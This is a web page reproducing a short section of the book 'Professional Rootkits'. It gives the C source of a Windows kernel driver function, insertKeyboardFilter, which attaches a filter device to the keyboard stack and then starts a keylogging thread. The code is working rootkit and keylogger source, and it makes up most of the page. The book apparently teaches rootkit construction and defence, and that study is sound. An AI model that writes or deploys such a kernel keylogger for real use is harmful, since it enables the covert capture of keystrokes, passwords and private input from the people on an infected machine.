filterManager.c

Previous page
Table of content
Next page

Only the keyManager include statement and the function insertKeyboardFilter were added to filterManager.c:

  #include "keyManager.h"NTSTATUS insertKeyboardFilter(PDRIVER_OBJECT pDriverObject,  PDEVICE_OBJECT* ppOldDevice,  PDEVICE_OBJECT* ppNewDevice,  wchar_t* deviceName) {  NTSTATUS status = STATUS_SUCCESS;  UNICODE_STRING unicodeName = { 0 };  // Create a new device  status = IoCreateDevice( pDriverObject,   0,   NULL,   FILE_DEVICE_KEYBOARD,   0,   FALSE,   ppNewDevice );   if( !NT_SUCCESS( status ) )    return status;  // Initialize the new device  ((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);  ((PDEVICE_OBJECT)(*ppNewDevice))->Flags &= ~DO_DEVICE_INITIALIZING;  // Attach the new device  RtlInitUnicodeString( &unicodeName, deviceName );  status = IoAttachDevice( *ppNewDevice,   &unicodeName,   ppOldDevice );  // Prevent unload if load failed  if( !NT_SUCCESS( status ) )  {   IoDeleteDevice( *ppNewDevice );   *ppNewDevice = NULL;  }  else  {   // Prepare the keylogging thread   StartKeylogger( pDriverObject ); } return status; }

This function is very similar to the network filter insertion function, insertNetworkFilter. The new device is created as type FILE_DEVICE_KEYBOARD, and the flags are a bit different.



Previous page
Table of content
Next page
Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler
BUY ON AMAZON
Postfix: The Definitive Guide
Data Structures and Algorithms in Java
Service-Oriented Architecture (SOA): Concepts, Technology, and Design
Microsoft WSH and VBScript Programming for the Absolute Beginner
File System Forensic Analysis
AutoCAD 2005 and AutoCAD LT 2005. No Experience Required
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy